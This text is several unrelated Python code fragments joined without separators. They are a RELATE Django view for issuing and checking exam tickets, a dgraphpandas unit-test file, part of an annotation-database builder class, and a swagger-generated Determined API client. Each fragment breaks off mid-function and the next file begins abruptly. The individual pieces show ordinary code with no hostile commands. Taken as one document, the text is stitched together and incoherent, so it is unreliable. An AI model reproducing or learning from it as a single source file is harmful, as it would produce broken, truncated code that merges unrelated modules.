have one hour to complete the exam."), """ **""", _("Good luck!"), """** {% endfor %} <div style="clear:left; margin-bottom:3ex"></div>""") class BatchIssueTicketsForm(StyledForm): # prevents form submission with codemirror's empty textarea use_required_attribute = False def __init__(self, course, editor_mode, *args, **kwargs): super(BatchIssueTicketsForm, self).__init__(*args, **kwargs) from course.utils import get_codemirror_widget cm_widget, cm_help_text = get_codemirror_widget( language_mode={"name": "markdown", "xml": True}, dependencies=("xml",), interaction_mode=editor_mode) help_text = (ugettext("Enter <a href=\"http://documen.tician.de/" "relate/content.html#relate-markup\">" "RELATE markup</a> containing Django template statements to render " "your exam tickets. <tt>tickets</tt> contains a list of " "data structures " "containing ticket information. For each entry <tt>tkt</tt> " "in this list, " "use <tt>{{ tkt.participation.user.user_name }}</tt>, " "<tt>{{ tkt.code }}</tt>, <tt>{{ tkt.exam.description }}</tt>, " "and <tt>{{ checkin_uri }}</tt> as placeholders. 
" "See the example for how to use this.")) self.fields["exam"] = forms.ModelChoiceField( queryset=( Exam.objects.filter( course=course, active=True )), required=True, label=_("Exam")) self.fields["valid_start_time"] = forms.DateTimeField( label=_("Start validity"), widget=DateTimePicker( options={"format": "YYYY-MM-DD HH:mm", "sideBySide": True}), required=False) self.fields["valid_end_time"] = forms.DateTimeField( label=_("End validity"), widget=DateTimePicker( options={"format": "YYYY-MM-DD HH:mm", "sideBySide": True}), required=False) self.fields["restrict_to_facility"] = forms.CharField( label=_("Restrict to facility"), help_text=_("If not blank, the exam ticket may only be used in the " "given facility"), required=False) self.fields["revoke_prior"] = forms.BooleanField( label=_("Revoke prior exam tickets"), required=False, initial=False) self.fields["format"] = forms.CharField( label=_("Ticket Format"), help_text=help_text, widget=cm_widget, initial=INITIAL_EXAM_TICKET_TEMPLATE, required=True) self.style_codemirror_widget() self.helper.add_input( Submit( "issue", _("Issue tickets"))) @course_view def batch_issue_exam_tickets(pctx): if not pctx.has_permission(pperm.batch_issue_exam_ticket): raise PermissionDenied(_("may not batch-issue tickets")) form_text = "" request = pctx.request if request.method == "POST": form = BatchIssueTicketsForm(pctx.course, request.user.editor_mode, request.POST) if form.is_valid(): exam = form.cleaned_data["exam"] from jinja2 import TemplateSyntaxError from course.content import markup_to_html try: with transaction.atomic(): if form.cleaned_data["revoke_prior"]: ExamTicket.objects.filter( exam=exam, state__in=( exam_ticket_states.valid, exam_ticket_states.used, ) ).update(state=exam_ticket_states.revoked) tickets = [] for participation in ( Participation.objects.filter( course=pctx.course, status=participation_status.active) .order_by("user__last_name") ): ticket = ExamTicket() ticket.exam = exam ticket.participation = 
participation ticket.creator = request.user ticket.state = exam_ticket_states.valid ticket.code = gen_ticket_code() ticket.valid_start_time = \ form.cleaned_data["valid_start_time"] ticket.valid_end_time = form.cleaned_data["valid_end_time"] ticket.restrict_to_facility = \ form.cleaned_data["restrict_to_facility"] ticket.save() tickets.append(ticket) checkin_uri = pctx.request.build_absolute_uri( reverse("relate-check_in_for_exam")) form_text = markup_to_html( pctx.course, pctx.repo, pctx.course_commit_sha, form.cleaned_data["format"], jinja_env={ "tickets": tickets, "checkin_uri": checkin_uri, }) except TemplateSyntaxError as e: messages.add_message(request, messages.ERROR, string_concat( _("Template rendering failed"), ": line %(lineno)d: %(err_str)s") % { "lineno": e.lineno, "err_str": e.message.decode("utf-8")}) except Exception as e: messages.add_message(request, messages.ERROR, string_concat( _("Template rendering failed"), ": %(err_type)s: %(err_str)s") % {"err_type": type(e).__name__, "err_str": str(e)}) else: messages.add_message(request, messages.SUCCESS, _("%d tickets issued.") % len(tickets)) else: form = BatchIssueTicketsForm(pctx.course, request.user.editor_mode) return render_course_page(pctx, "course/batch-exam-tickets-form.html", { "form": form, "form_text": form_text, "form_description": ugettext("Batch-Issue Exam Tickets") }) # }}} # {{{ check in def check_exam_ticket( username, # type: Optional[Text] code, # type: Optional[Text] now_datetime, # type: datetime.datetime facilities # type: Optional[FrozenSet[Text]] ): # type: (...) -> Tuple[bool, Text] """ :returns: (is_valid, msg) """ try: user = get_user_model().objects.get( username=username, is_active=True) ticket = ExamTicket.objects.get( participation__user=user, code=code, ) except ObjectDoesNotExist: return (False, _("User name or ticket code not recognized.")) if ticket.state not in [ exam_ticket_states.valid, exam_ticket_states.used ]: return (False, _("Ticket is not in usable state. 
(Has it been revoked?)")) from django.conf import settings from datetime import timedelta validity_period = timedelta( minutes=settings.RELATE_TICKET_MINUTES_VALID_AFTER_USE) if (ticket.state == exam_ticket_states.used and now_datetime >= ticket.usage_time + validity_period): return (False, _("Ticket has exceeded its validity period.")) if not ticket.exam.active: return (False, _("Exam is not active.")) if now_datetime < ticket.exam.no_exams_before: return (False, _("Exam has not started yet.")) if ( ticket.exam.no_exams_after is not None and ticket.exam.no_exams_after <= now_datetime): return (False, _("Exam has ended.")) if (ticket.restrict_to_facility and ( facilities is None or ticket.restrict_to_facility not in facilities)): return (False, _("Exam ticket requires presence in facility '%s'.") % ticket.restrict_to_facility) if ( ticket.valid_start_time is not None and now_datetime < ticket.valid_start_time): return (False, _("Exam ticket is not yet valid.")) if ( ticket.valid_end_time is not None and ticket.valid_end_time < now_datetime): return (False, _("Exam ticket has expired.")) return True, _("Ticket is valid.") class ExamTicketBackend(object): def authenticate(self, request, username=None, code=None, now_datetime=None, facilities=None): is_valid, msg = check_exam_ticket(username,
<filename>tests/strategies/test_vertical.py import unittest from unittest.mock import patch, Mock from datetime import datetime import pandas as pd from pandas.testing import assert_frame_equal from parameterized import parameterized from dgraphpandas.strategies.vertical import vertical_transform class Vertical(unittest.TestCase): @parameterized.expand([ (None, {'config', 'fake'}, 'config'), (pd.DataFrame(), None, 'config'), (pd.DataFrame(), {'config', 'fake'}, None), (pd.DataFrame(), {'config', 'fake'}, None), (pd.DataFrame(), {}, 'config'), (pd.DataFrame(), None, '') ]) def test_vertical_transform_null_parameter(self, frame, config, config_file_key): ''' Ensures when parameters are null, an error is raised. ''' with self.assertRaises(ValueError): vertical_transform(frame, config, config_file_key) def test_vertical_transform_config_file_key_not_in_config(self): ''' Ensures when the passed config key is not within the config then an error is raised. ''' frame = pd.DataFrame() config_file_key = 'not_my_file' config = { 'files': {'my_file': {}} } with self.assertRaises(KeyError): vertical_transform(frame, config, config_file_key) def test_vertical_transform_subject_fields_not_defined(self): ''' Ensures when subject_fields has not been defined, then an error is raised. ''' frame = pd.DataFrame() config_file_key = 'customer' config = { 'files': { config_file_key: { 'type_overrides': {} } } } with self.assertRaises(ValueError): vertical_transform(frame, config, config_file_key) def test_vertical_predicate_column_not_defined(self): ''' Ensures when the predicate column is not defined then we throw an error. 
''' frame = pd.DataFrame(data={ 'customer_id': [1, 2, 3], 'not_a_predicate': ['age', 'weight', 'orders'], 'object': [23, 90, 10] }) config_file_key = 'customer' config = { 'files': { 'customer': { 'subject_fields': ['customer_id'], } } } with self.assertRaises(KeyError): vertical_transform(frame, config, config_file_key) def test_vertical_object_column_not_defined(self): ''' Ensures when the object column is not defined then we throw an error. ''' frame = pd.DataFrame(data={ 'customer_id': [1, 2, 3], 'predicate': ['age', 'weight', 'orders'], 'not_a_object': [23, 90, 10] }) config_file_key = 'customer' config = { 'files': { 'customer': { 'subject_fields': ['customer_id'], } } } with self.assertRaises(KeyError): vertical_transform(frame, config, config_file_key) def test_vertical_transform_intrinsic_with_default_values(self): ''' Ensures when a DataFrame is passed with the default options then an intrinsic dataframe is created and an empty edges frame is created. ''' frame = pd.DataFrame(data={ 'customer_id': [1, 2, 3], 'predicate': ['age', 'weight', 'orders'], 'object': [23, 90, 10] }) config_file_key = 'customer' config = { 'files': { 'customer': { 'subject_fields': ['customer_id'], 'dgraph_type': "customer" } } } expected_frame = pd.DataFrame(data={ 'subject': ['customer_1', 'customer_2', 'customer_3', 'customer_1', 'customer_2', 'customer_3'], 'predicate': ['age', 'weight', 'orders', 'dgraph.type', 'dgraph.type', 'dgraph.type'], 'object': [23, 90, 10, 'customer', 'customer', 'customer'], 'type': ['<xs:string>']*6 }) intrinsic, edges = vertical_transform(frame, config, config_file_key) intrinsic = intrinsic.reset_index(drop=True) expected_frame = expected_frame.reset_index(drop=True) assert_frame_equal(expected_frame, intrinsic) self.assertTrue(edges.empty) def test_vertical_transform_with_type_overrides(self): ''' Ensures when type overrides have been provided, they are applied ''' frame = pd.DataFrame(data={ 'customer_id': [1, 2, 3], 'predicate': ['age', 
'weight', 'orders'], 'object': [23, 90, 10] }) config_file_key = 'customer' config = { 'files': { 'customer': { 'subject_fields': ['customer_id'], 'dgraph_type': "customer", 'type_overrides': { 'age': 'int32', 'weight': 'float32', 'orders': 'int32', } } } } expected_frame = pd.DataFrame(data={ 'subject': ['customer_1', 'customer_2', 'customer_3', 'customer_1', 'customer_2', 'customer_3'], 'predicate': ['age', 'weight', 'orders', 'dgraph.type', 'dgraph.type', 'dgraph.type'], 'object': [23, 90, 10, 'customer', 'customer', 'customer'], 'type': ['<xs:int>', '<xs:float>', '<xs:int>'] + ['<xs:string>']*3 }) intrinsic, edges = vertical_transform(frame, config, config_file_key) intrinsic = intrinsic.reset_index(drop=True) expected_frame = expected_frame.reset_index(drop=True) assert_frame_equal(expected_frame, intrinsic) self.assertTrue(edges.empty) @patch('dgraphpandas.strategies.vertical.pd.read_csv') def test_vertical_transform_csv_file(self, mock_pandas: Mock): ''' Ensures when a file path is passed, then the file is read from pandas with the given options ''' file = 'test.csv' read_csv_options = {'sep': ';'} frame = pd.DataFrame(data={ 'customer_id': [1, 2, 3], 'predicate': ['age', 'weight', 'orders'], 'object': [23, 90, 10] }) mock_pandas.return_value = frame config_file_key = 'customer' config = { 'files': { 'customer': { 'subject_fields': ['customer_id'], 'dgraph_type': "customer", 'type_overrides': { 'age': 'int32', 'weight': 'float32', 'orders': 'int32', }, 'read_csv_options': read_csv_options } } } expected_frame = pd.DataFrame(data={ 'subject': ['customer_1', 'customer_2', 'customer_3', 'customer_1', 'customer_2', 'customer_3'], 'predicate': ['age', 'weight', 'orders', 'dgraph.type', 'dgraph.type', 'dgraph.type'], 'object': [23, 90, 10, 'customer', 'customer', 'customer'], 'type': ['<xs:int>', '<xs:float>', '<xs:int>'] + ['<xs:string>']*3 }) intrinsic, edges = vertical_transform(file, config, config_file_key) args, kwargs = mock_pandas.call_args_list[0] 
self.assertEqual(file, args[0]) self.assertEqual(read_csv_options, kwargs) intrinsic = intrinsic.reset_index(drop=True) expected_frame = expected_frame.reset_index(drop=True) assert_frame_equal(expected_frame, intrinsic) self.assertTrue(edges.empty) @parameterized.expand([ ### ( 'with_default_values', 'customer', { 'files': { 'customer': { 'subject_fields': ['customer_id'], 'dgraph_type': "customer", 'type_overrides': { 'age': 'int32', 'weight': 'float32', 'orders': 'int32', } } } }, pd.DataFrame(data={ 'customer_id': [1, 2, 3], 'predicate': ['age', 'weight', 'orders'], 'object': [23, 90, 10] }), pd.DataFrame(data={ 'subject': ['customer_1', 'customer_2', 'customer_3', 'customer_1', 'customer_2', 'customer_3'], 'predicate': ['age', 'weight', 'orders', 'dgraph.type', 'dgraph.type', 'dgraph.type'], 'object': [23, 90, 10, 'customer', 'customer', 'customer'], 'type': ['<xs:int>', '<xs:float>', '<xs:int>'] + ['<xs:string>']*3 }), pd.DataFrame(columns=['subject', 'predicate', 'object', 'type']), {} ), ### ( 'no_dgraph_type_defaults_to_config_key', 'customer', { 'files': { 'customer': { 'subject_fields': ['customer_id'], 'type_overrides': { 'age': 'int32', 'weight': 'float32', 'orders': 'int32', } } } }, pd.DataFrame(data={ 'customer_id': [1, 2, 3], 'predicate': ['age', 'weight', 'orders'], 'object': [23, 90, 10] }), pd.DataFrame(data={ 'subject': ['customer_1', 'customer_2', 'customer_3', 'customer_1', 'customer_2', 'customer_3'], 'predicate': ['age', 'weight', 'orders', 'dgraph.type', 'dgraph.type', 'dgraph.type'], 'object': [23, 90, 10, 'customer', 'customer', 'customer'], 'type': ['<xs:int>', '<xs:float>', '<xs:int>'] + ['<xs:string>']*3 }), pd.DataFrame(columns=['subject', 'predicate', 'object', 'type']), {} ), ### ( 'custom_predicate', 'customer', { 'files': { 'customer': { 'subject_fields': ['customer_id'], 'type_overrides': { 'age': 'int32', 'weight': 'float32', 'orders': 'int32', }, 'predicate_field': 'my_field' } } }, pd.DataFrame(data={ 'customer_id': [1, 2, 
3], 'my_field': ['age', 'weight', 'orders'], 'object': [23, 90, 10] }), pd.DataFrame(data={ 'subject': ['customer_1', 'customer_2', 'customer_3', 'customer_1', 'customer_2', 'customer_3'], 'predicate': ['age', 'weight', 'orders', 'dgraph.type', 'dgraph.type', 'dgraph.type'], 'object': [23, 90, 10, 'customer', 'customer', 'customer'], 'type': ['<xs:int>', '<xs:float>', '<xs:int>'] + ['<xs:string>']*3 }), pd.DataFrame(columns=['subject', 'predicate', 'object', 'type']), {} ), ### ( 'custom_object', 'customer', { 'files': { 'customer': { 'subject_fields': ['customer_id'], 'type_overrides': { 'age': 'int32', 'weight': 'float32', 'orders': 'int32', }, 'object_field': 'my_object_field' } } }, pd.DataFrame(data={ 'customer_id': [1, 2, 3], 'predicate': ['age', 'weight', 'orders'], 'my_object_field': [23, 90, 10] }), pd.DataFrame(data={ 'subject': ['customer_1', 'customer_2', 'customer_3', 'customer_1', 'customer_2', 'customer_3'], 'predicate': ['age', 'weight', 'orders', 'dgraph.type', 'dgraph.type', 'dgraph.type'], 'object': [23, 90, 10, 'customer', 'customer', 'customer'], 'type': ['<xs:int>', '<xs:float>', '<xs:int>'] + ['<xs:string>']*3 }), pd.DataFrame(columns=['subject', 'predicate', 'object', 'type']), {} ), ### ( 'custom_predicate_and_object', 'customer', { 'files': { 'customer': { 'subject_fields': ['customer_id'], 'type_overrides': { 'age': 'int32', 'weight': 'float32', 'orders': 'int32', }, 'object_field': 'my_object_field', 'predicate_field': 'my_field' } } }, pd.DataFrame(data={ 'customer_id': [1, 2, 3], 'my_field': ['age', 'weight', 'orders'], 'my_object_field': [23, 90, 10] }), pd.DataFrame(data={ 'subject': ['customer_1', 'customer_2', 'customer_3', 'customer_1', 'customer_2', 'customer_3'], 'predicate': ['age', 'weight', 'orders', 'dgraph.type', 'dgraph.type', 'dgraph.type'], 'object': [23, 90, 10, 'customer', 'customer', 'customer'], 'type': ['<xs:int>', '<xs:float>', '<xs:int>'] + ['<xs:string>']*3 }), pd.DataFrame(columns=['subject', 'predicate', 
'object', 'type']), {} ), ### ( 'rename_fields', 'customer', { 'files': { 'customer': { 'subject_fields': ['customer_id'], 'pre_rename': { 'orders': 'no_of_orders', 'age': 'birth' } } } }, pd.DataFrame(data={ 'customer_id': [1, 2, 3], 'predicate': ['age', 'weight', 'orders'], 'object': [23, 90, 10] }), pd.DataFrame(data={ 'subject': ['customer_1', 'customer_2', 'customer_3', 'customer_1', 'customer_2', 'customer_3'], 'predicate': ['birth', 'weight', 'no_of_orders', 'dgraph.type', 'dgraph.type', 'dgraph.type'], 'object': [23, 90, 10, 'customer', 'customer', 'customer'], 'type': ['<xs:string>']*6 }), pd.DataFrame(columns=['subject', 'predicate', 'object', 'type']), {} ), ### ( 'rename_fields_kwargs', 'customer', { 'files': { 'customer': {'subject_fields': ['customer_id']} } }, pd.DataFrame(data={ 'customer_id': [1, 2, 3], 'predicate': ['age', 'weight', 'orders'], 'object': [23, 90, 10] }), pd.DataFrame(data={ 'subject': ['customer_1', 'customer_2', 'customer_3', 'customer_1', 'customer_2', 'customer_3'], 'predicate': ['birth', 'weight', 'no_of_orders', 'dgraph.type', 'dgraph.type', 'dgraph.type'], 'object': [23, 90, 10, 'customer', 'customer', 'customer'], 'type': ['<xs:string>']*6 }), pd.DataFrame(columns=['subject', 'predicate', 'object', 'type']), { 'pre_rename': { 'orders': 'no_of_orders', 'age': 'birth' } } ), ### ( 'ignore_fields', 'customer', { 'files': { 'customer': { 'subject_fields': ['customer_id'], 'ignore_fields': ['age'] } } }, pd.DataFrame(data={ 'customer_id': [1, 2, 3], 'predicate': ['age', 'weight', 'orders'], 'object': [23, 90, 10] }), pd.DataFrame(data={ 'subject': ['customer_2', 'customer_3', 'customer_2', 'customer_3'], 'predicate': ['weight', 'orders', 'dgraph.type', 'dgraph.type'], 'object': [90, 10, 'customer', 'customer'], 'type': ['<xs:string>']*4 }), pd.DataFrame(columns=['subject', 'predicate', 'object', 'type']), {} ), ### ( 'ignore_fields_kwargs', 'customer', { 'files': { 'customer': {'subject_fields': ['customer_id']} } }, 
pd.DataFrame(data={ 'customer_id': [1, 2, 3], 'predicate': ['age', 'weight', 'orders'], 'object': [23, 90, 10] }), pd.DataFrame(data={ 'subject': ['customer_2', 'customer_3', 'customer_2', 'customer_3'], 'predicate': ['weight', 'orders', 'dgraph.type', 'dgraph.type'], 'object': [90, 10, 'customer', 'customer'], 'type': ['<xs:string>']*4 }), pd.DataFrame(columns=['subject', 'predicate', 'object', 'type']), {'ignore_fields': ['age']} ), ### ( 'with_csv_edges', 'customer', { 'files': { 'customer': { 'subject_fields': ['customer_id'], 'csv_edges': ['orders'] }, }, 'add_dgraph_type_records': False }, pd.DataFrame(data={ 'customer_id': [1, 2, 3], 'predicate': ['age', 'weight', 'orders'], 'object': [23, 90, '1,2,3'] }), pd.DataFrame(data={ 'subject': ['customer_1', 'customer_2', 'customer_3', 'customer_3', 'customer_3'], 'predicate': ['age', 'weight', 'orders', 'orders', 'orders'], 'object': [23, 90, '1', '2', '3'], 'type': ['<xs:string>']*5 }), pd.DataFrame(columns=['subject', 'predicate', 'object', 'type']), {} ), ### ( 'with_csv_edges_kwargs', 'customer', { 'files': { 'customer': { 'subject_fields': ['customer_id'], }, }, 'add_dgraph_type_records': False }, pd.DataFrame(data={ 'customer_id': [1, 2, 3], 'predicate': ['age', 'weight', 'orders'],
count, size = 0, len(self.articles) for id_ in self.articles: count = self.progression(count=count, modulo=self.modulo_articles, size=size, text='article') try: self.articles[id_].compute_corpus_annotations() except ParseError: raise Exception("Data is not clean, remove data %s and start again." % id_) self.write_debug(field='articles', method='annotations') @Verbose("Computing the contexts...") def compute_contexts(self): """ Compute the contexts of the articles for each Tuple. """ count, size = 0, len(self.tuples) for tuple_ in self.tuples: count = self.progression(count=count, modulo=self.modulo_tuples, size=size, text='tuple') query_ids = set() for article_id_ in tuple_.article_ids: self.articles[article_id_].compute_contexts(tuple_=tuple_) query_ids.update({tuple_.id_ + '_' + article_id_ + '_' + context_id_ for context_id_ in self.articles[article_id_].contexts[str(tuple_)]}) tuple_.query_ids = query_ids self.write_debug(field='articles', method='contexts') @Verbose("Computing the Wikipedia information...") def compute_wikipedia(self, load): """ Compute the wikipedia information about the entities from self.tuples. Args: load: bool, if True, load an existing file. """ wikipedia = self.wikipedia if load else {'found': dict(), 'not_found': set()} self.print("Initial entries: %i found/%i not found." 
% (len(wikipedia['found']), len(wikipedia['not_found']))) try: count, size = 0, len(self.entities) for name, entity in self.entities.items(): count = self.progression(count=count, modulo=self.modulo_entities, size=size, text='entity') if not load: wiki = entity.get_wiki() if wiki.summary is not None: wikipedia['found'][name] = wiki else: wikipedia['not_found'].add(name) else: if name in wikipedia['found']: wiki = wikipedia['found'][name] elif name in wikipedia['not_found']: wiki = Wikipedia() else: wiki = entity.get_wiki() if wiki.summary is not None: wikipedia['found'][name] = wiki else: wikipedia['not_found'].add(name) entity.wiki = wiki except (KeyboardInterrupt, WikipediaException) as err: self.print("An error occurred, saving the loaded information and leaving... (%s)" % str(err)) self.print("Final entries: %i found/%i not found." % (len(wikipedia['found']), len(wikipedia['not_found']))) self.wikipedia = wikipedia self.write_debug(field='wikipedia', method='wikipedia') @Verbose("Computing the Queries...") @Attribute('queries') def compute_queries(self): """ Compute the Queries of the database. """ queries = dict() count, size = 0, len(self.tuples) for tuple_ in self.tuples: count = self.progression(count=count, modulo=self.modulo_tuples, size=size, text='tuple') for article_id_ in sorted(tuple_.article_ids): article_contexts = self.articles[article_id_].contexts[str(tuple_)] for context_id_, context in article_contexts.items(): query_id_ = '_'.join([article_id_, tuple_.id_, context_id_]) queries[query_id_] = Query(id_=query_id_, tuple_=tuple_, article=self.articles[article_id_], context=context) self.queries = queries self.write_debug(field='queries', method='queries') @Verbose("Computing the annotated queries...") @Attribute('queries') def compute_annotated_queries(self, exclude_pilot): """ Compute the queries corresponding to the annotations. Args: exclude_pilot: bool, whether or not to exclude the data from the pilot. 
""" queries = dict() for path in sorted(glob(self.results_path + 'annotations/*/task/*.pkl')): path = path.split(self.results_path)[1] version = path.split('/')[1] if not exclude_pilot or 'pilot' not in version: folder_name = '/'.join(path.split('/')[:-1]) file_name = path.split('/')[-1].split('.pkl')[0] queries.update(self.load_obj_pkl(file_name=file_name, folder_name=folder_name)) self.queries = queries @Verbose("Computing the annotations...") @Attribute('annotations') def compute_annotations(self, exclude_pilot): """ Compute the annotations of the Mechanical Turks. Args: exclude_pilot: bool, whether or not to exclude the data from the pilot. """ annotations = defaultdict(list) for path in sorted(glob(self.results_path + 'annotations/*/results/*.csv')): path = path.split(self.results_path)[1] version = path.split('/')[1] batch = path.split('/')[-1].replace('_complete.csv', '') if not exclude_pilot or 'pilot' not in version: df = read_csv(self.results_path + path) self.print("%s loaded from %s" % (batch, path)) for _, row in df.iterrows(): id_ = row.get('Input.id_') annotations[id_].append(Annotation(id_=id_, version=version, batch=batch, row=row, silent=self.silent)) self.annotations = annotations # endregion # region Cleaning methods @Verbose("Cleaning the database's articles...") @Attribute('articles') def clean_articles(self, criterion, to_keep): """ Removes from the database the articles which meet the Article's criterion or whose ids are not in to_keep. Args: criterion: function, criterion that an article must meet to be removed. to_keep: set, ids of the articles that must be kept. 
""" to_del = set() if criterion is not None and to_keep is None: self.print("Criterion: %s" % [line for line in criterion.__doc__.splitlines() if line][0][8:]) for id_ in self.articles: if criterion(self.articles[id_]): to_del.add(id_) elif criterion is None and to_keep is not None: self.print("Criterion: keep only the designated articles.") for id_ in self.articles: if id_ not in to_keep: to_del.add(id_) else: raise Exception("Either a criterion or to_keep must be specified.") for id_ in to_del: del self.articles[id_] @Verbose("Cleaning the database's tuples...") @Attribute('tuples') def clean_tuples(self, to_keep): """ Removes from the database the tuples whose names are not in to_keep. Args: to_keep: set, names of the tuples that must be kept. """ self.print("Criterion: keep only the designated tuples.") tuples = self.tuples self.tuples = [] for tuple_ in tuples: if str(tuple_) in to_keep: self.tuples.append(tuple_) @Verbose("Cleaning the database's entities...") @Attribute('entities') def clean_entities(self, to_keep): """ Removes from the database the entities whose names are not in to_keep. Args: to_keep: set, names of the entities that must be kept. """ self.print("Criterion: keep only the designated entities.") to_del = set() for name in self.entities: if name not in to_keep: to_del.add(name) for name in to_del: del self.entities[name] @Verbose("Filtering the articles and entities that correspond to no tuple...") def filter_no_tuple(self): """ Filter out the articles and entities that correspond to no tuple. 
""" to_keep_articles, to_keep_entities = set(), set() for tuple_ in self.tuples: if len(tuple_.article_ids) >= 1: to_keep_articles.update(tuple_.article_ids) to_keep_entities.update([str(entity) for entity in tuple_.entities]) self.clean_articles(criterion=None, to_keep=to_keep_articles) self.clean_entities(to_keep=to_keep_entities) @Verbose("Filtering the articles, tuples and entities that correspond to no query...") def filter_no_query(self): """ Filter out the articles that correspond to no query. """ to_keep_articles, to_keep_tuples, to_keep_entities = set(), set(), set() for tuple_ in self.tuples: if len(tuple_.query_ids) >= 1: to_keep_tuples.add(str(tuple_)) to_keep_articles.update(tuple_.article_ids) to_keep_entities.update([str(entity) for entity in tuple_.entities]) self.clean_tuples(to_keep=to_keep_tuples) self.clean_articles(criterion=None, to_keep=to_keep_articles) self.clean_entities(to_keep=to_keep_entities) # endregion # region File methods def file_name_suffix(self): """ Returns a standardized ending for a file name. Returns: str, ending of the name of the file (after the basic name of the file). """ return '_short' if self.short else '' def save_attr_pkl(self, attribute_name, file_name, folder_name): """ Save an attribute designated by its name using pickle. Args: attribute_name: str, name of the attribute to save. file_name: str, name of the file; if None, save an attribute with the attribute_name. folder_name: str, name of the folder to save in. """ file_name = file_name or attribute_name + self.file_name_suffix() obj = getattr(self, attribute_name) self.save_obj_pkl(obj=obj, file_name=file_name, folder_name=folder_name) def save_obj_pkl(self, obj, file_name, folder_name): """ Save an object using pickle. Args: obj: unknown type, object to save. file_name: str, name of the file. folder_name: str, name of the folder to save in. 
""" file_name = self.results_path + folder_name + "/" + file_name + ".pkl" if self.save: try: with open(file_name, "wb") as file: dump(obj=obj, file=file, protocol=-1) self.print("Object saved at %s." % file_name) except PicklingError as err: self.print("Could not save (PicklingError), moving on: %s" % str(err)) else: self.print("Not saving %s (not in save mode)." % file_name) def load_attr_pkl(self, attribute_name, file_name, folder_name): """ Load an attribute designated by its name using pickle. Args: attribute_name: str, name of the attribute to load. file_name: str, name of the file to load; if None, load the file with the corresponding attribute_name. folder_name: str, name of the folder to load from. """ file_name = file_name or attribute_name + self.file_name_suffix() obj = self.load_obj_pkl(file_name=file_name, folder_name=folder_name) setattr(self, attribute_name, obj) def load_obj_pkl(self, file_name, folder_name): """ Load an object using pickle. Args: file_name: str, name of the file to load. folder_name: str, name of the folder to load from. """ file_name = self.results_path + folder_name + "/" + file_name + ".pkl" with open(file_name, 'rb') as file: obj = load(file) self.print("Object loaded from %s." % file_name) return obj @Verbose("Reading the existing annotation batches...") def read_existing_batches(self, exclude_pilot): """ Read in the folder queries and annotations the query ids and the batch indexes of the existing annotation batches (in .csv files). Args: exclude_pilot: bool, whether or not to take into account the pilot annotations. Returns: existing_ids: set, ids in the existing annotation batches. existing_batches: set, indexes of the existing annotation batches. 
""" ids, idxs = set(), set() for path in glob(self.results_path + "queries/*.csv"): batch = path.split("/")[-1].split(".")[0] if not exclude_pilot or "pilot" not in batch: df = read_csv(path) df_ids = set([row.get('id_') for _, row in df.iterrows()]) ids.update(df_ids) if batch.split("_")[0] == "batch": idx = int(batch.split("_")[-1]) idxs.add(idx) self.print("Reading %s from results/queries/ folder (%i queries)." % (batch, len(df_ids))) for path in glob(self.results_path + "annotations/*/task/*.csv"): version = path.split("/")[-3] batch = path.split("/")[-1].split(".")[0] if not exclude_pilot or 'pilot' not in version: df = read_csv(path) df_ids = set([row.get('id_') for _, row in df.iterrows()]) ids.update(df_ids) if batch.split("_")[0] == "batch": idx = int(batch.split("_")[-1]) idxs.add(idx) self.print("Reading existing batch %s from %s (%i queries)." % (batch, version, len(df_ids))) return ids, idxs @Verbose("Saving new annotation batches...") def save_annotation_batches(self, batches, batch_size, existing_ids, existing_batches): """ Save annotation batches in .csv files. Don't save queries that have been already saved. Args:
# coding: utf-8

"""
    Determined API (Beta)

    Determined helps deep learning teams train models more quickly, easily share GPU resources, and effectively collaborate. Determined allows deep learning engineers to focus on building and training models at scale, without needing to worry about DevOps or writing custom code for common tasks like fault tolerance or experiment tracking. You can think of Determined as a platform that bridges the gap between tools like TensorFlow and PyTorch --- which work great for a single researcher with a single GPU --- to the challenges that arise when doing deep learning at scale, as teams, clusters, and data sets all increase in size.  # noqa: E501

    OpenAPI spec version: 0.1
    Contact: <EMAIL>
    Generated by: https://github.com/swagger-api/swagger-codegen.git
"""

from __future__ import absolute_import

import re  # noqa: F401

# python 2 and python 3 compatibility library
import six

from determined._swagger.client.api_client import ApiClient


class ExperimentsApi(object):
    """NOTE: This class is auto generated by the swagger code generator program.

    Do not edit the class manually.
    Ref: https://github.com/swagger-api/swagger-codegen
    """

    def __init__(self, api_client=None):
        # Default to a fresh ApiClient when the caller does not supply one.
        if api_client is None:
            api_client = ApiClient()
        self.api_client = api_client

    def determined_activate_experiment(self, id, **kwargs):  # noqa: E501
        """Activate an experiment.  # noqa: E501

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.determined_activate_experiment(id, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param int id: The experiment id. (required)
        :return: V1ActivateExperimentResponse
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        # async_req=True returns the request thread; otherwise return the data.
        if kwargs.get('async_req'):
            return self.determined_activate_experiment_with_http_info(id, **kwargs)  # noqa: E501
        else:
            (data) = self.determined_activate_experiment_with_http_info(id, **kwargs)  # noqa: E501
            return data

    def determined_activate_experiment_with_http_info(self, id, **kwargs):  # noqa: E501
        """Activate an experiment.  # noqa: E501

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.determined_activate_experiment_with_http_info(id, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param int id: The experiment id. (required)
        :return: V1ActivateExperimentResponse
                 If the method is called asynchronously,
                 returns the request thread.
        """

        all_params = ['id']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        # Generated-code pattern: validate **kwargs against the declared
        # parameter list via locals(), rejecting unknown keywords.
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method determined_activate_experiment" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'id' is set
        if ('id' not in params or
                params['id'] is None):
            raise ValueError("Missing the required parameter `id` when calling `determined_activate_experiment`")  # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'id' in params:
            path_params['id'] = params['id']  # noqa: E501

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['BearerToken']  # noqa: E501

        return self.api_client.call_api(
            '/api/v1/experiments/{id}/activate', 'POST',
            path_params,
            query_params,
            header_params,
            body=body_params,
